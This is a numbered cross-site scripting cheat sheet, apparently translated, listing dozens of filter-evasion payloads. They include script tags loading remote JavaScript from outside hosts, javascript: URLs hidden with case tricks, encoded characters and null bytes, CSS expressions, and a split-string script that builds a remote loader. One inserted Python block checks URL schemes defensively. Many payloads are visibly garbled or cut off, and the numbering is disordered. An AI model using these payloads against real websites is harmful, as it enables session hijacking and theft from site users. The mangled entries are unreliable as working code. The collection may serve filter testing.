(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative alert pop-ups
<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2) IMG tag XSS using JavaScript commands
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Defective IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-digit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=\'#\'" /span>

(11) Embedded tab character, splitting up the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab character, splitting up the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Multi-line embedded JavaScript injection; this is an extreme XSS example
<IMG SRC=\'#\'" /span>

(16) Getting around character limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters are basically ineffective in China, because there is nowhere they can be exploited
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=\'#\'" javascript:alert('XSS');">
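The javascript: scheme obfuscations in items (3) through (19) above (case changes, HTML character references with and without semicolons, embedded tab, newline and carriage return, null and other control characters) all depend on the browser normalizing the URL before it recognizes the scheme. The defensive check below is an added example, not part of the original cheat sheet: it applies the same normalization before allow-listing the scheme, so a filter that only looks for the literal string "javascript:" is not what decides. The `is_safe_url` function, the allow-list and the sample inputs are constructed for this example.

```python
import html
import re

# Browsers tolerate NUL and ASCII control/whitespace characters (0x00-0x20)
# inside or around the scheme; strip them all before matching, which is a
# deliberately conservative superset of what the URL parser itself drops.
_CONTROLS = re.compile(r"[\x00-\x20]")
_SCHEME = re.compile(r"([A-Za-z][A-Za-z0-9+.-]*):")

# Allow-list of schemes an href/src attribute may carry (an assumption of this
# example). Everything else, including javascript: and vbscript:, is rejected.
ALLOWED_SCHEMES = {"http", "https", "mailto"}


def normalize_url(value: str) -> str:
    """Decode HTML character references (with or without a trailing semicolon,
    as browsers do) and drop control/whitespace characters."""
    return _CONTROLS.sub("", html.unescape(value))


def extract_scheme(value: str) -> str:
    """Lower-cased scheme of the normalized URL, or '' for a relative URL."""
    match = _SCHEME.match(normalize_url(value))
    return match.group(1).lower() if match else ""


def is_safe_url(value: str) -> bool:
    """True when the URL is relative or uses an allow-listed scheme."""
    scheme = extract_scheme(value)
    return scheme == "" or scheme in ALLOWED_SCHEMES


# Constructed inputs mirroring the obfuscations listed on this page,
# mapped to the verdict a correct filter must reach.
SAMPLES = {
    "http://example.com/": True,
    "/relative/path": True,
    "javascript:alert('XSS')": False,                 # item (3)
    "JaVaScRiPt:alert('XSS')": False,                 # item (4), case variation
    "&#106;&#97;&#118;&#97;script:alert(1)": False,   # item (5), entities
    "&#106&#97&#118&#97script:alert(1)": False,       # item (9), no semicolons
    "jav&#x09;ascript:alert(1)": False,               # item (12), encoded tab
    "jav\nascript:alert(1)": False,                   # item (13), newline
    "java\x00script:alert(1)": False,                 # item (17), null byte
    " &#14; javascript:alert(1)": False,              # item (19), leading meta chars
}


def check_samples() -> dict:
    """Map each sample to whether is_safe_url() agrees with the expected verdict."""
    return {url: is_safe_url(url) == ok for url, ok in SAMPLES.items()}
```

The normalized string is used only for the scheme decision; the original attribute value, if accepted, should still be output with proper attribute encoding.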
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(23) Extraneous open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes
\";alert('XSS');//

(30) End TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC=\'#\'" /span>

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC=\'#\'" /span>

(35) IMG Lowsrc
<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND
<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META with a URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC=\'#\'" /IFRAME>

(43) Frame
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters added (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous HTML with a STYLE attribute (made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed a Flash file that contains XSS
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>